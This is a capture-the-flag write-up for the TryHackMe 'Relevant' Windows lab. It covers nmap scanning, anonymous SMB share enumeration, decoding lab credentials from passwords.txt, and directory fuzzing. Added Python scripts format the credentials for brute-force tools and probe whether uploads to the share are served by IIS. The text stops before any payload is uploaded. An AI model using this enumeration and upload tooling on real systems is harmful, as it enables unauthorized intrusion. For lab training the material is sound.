https://tryhackme.com/room/relevant
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2022-08-05T13:54:45
|_Not valid after: 2023-02-04T13:54:45
|_ssl-date: 2022-08-06T14:01:05+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: RELEVANT
| NetBIOS_Domain_Name: RELEVANT
| NetBIOS_Computer_Name: RELEVANT
| DNS_Domain_Name: Relevant
| DNS_Computer_Name: Relevant
| Product_Version: 10.0.14393
|_ System_Time: 2022-08-06T14:00:24+00:00
49663/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h23m59s, deviation: 3h07m50s, median: 0s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-08-06T14:00:28
|_ start_date: 2022-08-06T13:55:05
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-08-06T07:00:25-07:00
Since the target is Windows and nmap returned SMB information (null-session listing worked as guest, and SMB signing is not required), let's check whether any shares are exposed.
┌──(kali㉿VirtualBox)-[~]
└─$ smbclient -L \\\\10.10.31.5
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.31.5 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
After listing the shares, enumerate them one by one; the non-default share nt4wrksv is the first target.
┌──(kali㉿VirtualBox)-[~]
└─$ smbclient \\\\10.10.31.5\\nt4wrksv
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 25 17:46:04 2020
.. D 0 Sat Jul 25 17:46:04 2020
passwords.txt A 98 Sat Jul 25 11:15:33 2020
7735807 blocks of size 4096. 4946803 blocks available
smb: \> more passwords.txt
The file contains the following base64-encoded user passwords:
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
Decoding them as base64 in CyberChef gives:
Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$
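As an added example (not part of the original writeup), a small Python parser for the passwords.txt format: it skips the [Section] header, base64-decodes each record, splits on the first " - " so a password containing a hyphen survives intact, and keeps anything that does not decode or does not fit the "user - password" shape instead of dropping it silently. The sample text is a constructed copy of the file contents shown above.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample input: the contents of passwords.txt as shown in the writeup.
PASSWORDS_TXT = """[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
"""

# Lines of the "[Section]" form are headers, not encoded records.
_HEADER_RE = re.compile(r"^\s*\[.*\]\s*$")


def decode_line(line: str) -> Optional[str]:
    """Decode one base64 line to UTF-8 text; None if it is not valid base64/UTF-8."""
    try:
        raw = base64.b64decode(line.strip(), validate=True)
        return raw.decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def parse_passwords(text: str) -> Tuple[Dict[str, str], List[str]]:
    """Parse the 'user - password' records of a passwords.txt dump.

    Returns (credentials, leftovers): credentials maps user -> password for each
    line that decodes to 'user - password'; leftovers keeps raw lines that do not
    decode and decoded lines that do not follow that shape, so nothing is lost.
    """
    creds: Dict[str, str] = {}
    leftovers: List[str] = []
    for line in text.splitlines():
        if not line.strip() or _HEADER_RE.match(line):
            continue
        decoded = decode_line(line)
        if decoded is None:
            leftovers.append(line.strip())
            continue
        # Split on the first ' - ' only: the password itself may contain '-'.
        user, sep, password = decoded.partition(" - ")
        if sep and user and password:
            creds[user] = password
        else:
            leftovers.append(decoded)
    return creds, leftovers


if __name__ == "__main__":
    found, odd = parse_passwords(PASSWORDS_TXT)
    for user, password in found.items():
        print(f"{user}:{password}")
    for line in odd:
        print(f"[?] unparsed: {line}")
```

The credentials dictionary is in the user:password form that tools such as hydra or crackmapexec take, which is what you want next when testing them against RDP and SMB.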
However, after a few authentication attempts over RDP and other services, the provided credentials did not work. Hence, keep on fuzzing.
Here we notice that port 49663 serves the same IIS HTTP service as port 80, so we fuzz port 49663 instead.
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://10.10.31.5:49663 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -q -t 200
<......SNIPPET......>
/nt4wrksv (Status: 301) [Size: 156] [--> http://10.10.31.5:49663/nt4wrksv/]
Here we can access /nt4wrksv/passwords.txt, which is exactly the file from the SMB share: the share is served as a directory of the IIS site on port 49663.
Moving on, let's check whether we have write access to the SMB share.
┌──(kali㉿kali)-[~]
└─$ touch grass
On the SMB Share:
smb: \> put grass
putting file grass as \grass (0.0 kb/s) (average 0.0 kb/s)
smb: \> ls
. D 0 Sat Aug 6 10:06:13 2022
.. D 0 Sat Aug 6 10:06:13 2022
grass A 0 Sat Aug 6 10:06:13 2022
passwords.txt A 98 Sat Jul 25 11:15:33 2020
7735807 blocks of size 4096. 4950455 blocks available
Indeed we can upload our files to the SMB share! Let’s do something spicy.
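Added example, not from the original writeup: a Python helper that automates the write check above and confirms the share/web-root overlap found with gobuster. The listing parser is exercised against a constructed copy of the smbclient ls output shown above; the live part shells out to smbclient with a null session (-N), uploads a uniquely named marker file, requests it over HTTP, and deletes it again. The host, share and URL defaults are the ones in this writeup; the marker file name is an assumption of the example.

```python
import os
import re
import subprocess
import sys
import urllib.request
import uuid
from typing import List, Tuple

# One smbclient 'ls' entry: name, attribute letters, size, then a timestamp.
# The name group is greedy, which is safe because the attribute token is the
# last upper-case-letters-only field before the numeric size.
_LS_RE = re.compile(
    r"^\s*(?P<name>.*\S)\s+(?P<attrs>[DAHSRN]+)\s+(?P<size>\d+)\s+"
    r"[A-Za-z]{3} [A-Za-z]{3}\s+\d+ \d\d:\d\d:\d\d \d{4}\s*$"
)

# Constructed sample: the 'ls' output the share returned after the upload above.
SAMPLE_LS = """\
  .                                   D        0  Sat Aug  6 10:06:13 2022
  ..                                  D        0  Sat Aug  6 10:06:13 2022
  grass                               A        0  Sat Aug  6 10:06:13 2022
  passwords.txt                       A       98  Sat Jul 25 11:15:33 2020

                7735807 blocks of size 4096. 4950455 blocks available
"""

Entry = Tuple[str, str, int]


def parse_listing(output: str) -> List[Entry]:
    """Turn smbclient 'ls' output into (name, attrs, size) tuples, dropping '.' and '..'."""
    entries: List[Entry] = []
    for line in output.splitlines():
        m = _LS_RE.match(line)
        if m and m.group("name") not in (".", ".."):
            entries.append((m.group("name"), m.group("attrs"), int(m.group("size"))))
    return entries


def files_only(entries: List[Entry]) -> List[str]:
    """Names of regular files (anything without the D attribute)."""
    return [name for name, attrs, _ in entries if "D" not in attrs]


def share_urls(base_url: str, entries: List[Entry]) -> List[str]:
    """URL each file would have if the share is the directory served at base_url."""
    base = base_url.rstrip("/")
    return [f"{base}/{name}" for name in files_only(entries)]


def smb(host: str, share: str, command: str) -> str:
    """Run one smbclient command against //host/share as a null session (-N)."""
    proc = subprocess.run(
        ["smbclient", f"//{host}/{share}", "-N", "-c", command],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout


def http_ok(url: str) -> bool:
    """True if url answers HTTP 200; any error or timeout counts as not exposed."""
    try:
        with urllib.request.urlopen(url, timeout=5) as resp:
            return resp.status == 200
    except Exception:
        return False


def probe(host: str, share: str, base_url: str) -> bool:
    """Upload a uniquely named marker, confirm it lists, fetch it over HTTP, then delete it."""
    marker = f"probe-{uuid.uuid4().hex}.txt"  # unique name so no real file is clobbered
    with open(marker, "w") as fh:
        fh.write("write-test\n")
    try:
        smb(host, share, f"put {marker}")                       # write test
        listed = files_only(parse_listing(smb(host, share, "ls")))
        if marker not in listed:
            raise RuntimeError("upload did not error but the marker is not in the listing")
        exposed = http_ok(f"{base_url.rstrip('/')}/{marker}")  # web-root check
        print(f"[+] //{host}/{share} is writable; served under {base_url}: {exposed}")
        return exposed
    finally:
        try:
            smb(host, share, f"del {marker}")                   # clean up the remote copy
        except subprocess.CalledProcessError:
            pass
        os.remove(marker)


if __name__ == "__main__":
    args = sys.argv[1:]
    host = args[0] if len(args) > 0 else "10.10.31.5"
    share = args[1] if len(args) > 1 else "nt4wrksv"
    url = args[2] if len(args) > 2 else "http://10.10.31.5:49663/nt4wrksv/"
    probe(host, share, url)
```

Run it as `python3 probe.py 10.10.31.5 nt4wrksv http://10.10.31.5:49663/nt4wrksv/`. If the marker comes back with HTTP 200, anything written to the share is served by IIS, which is the condition that makes the next step possible.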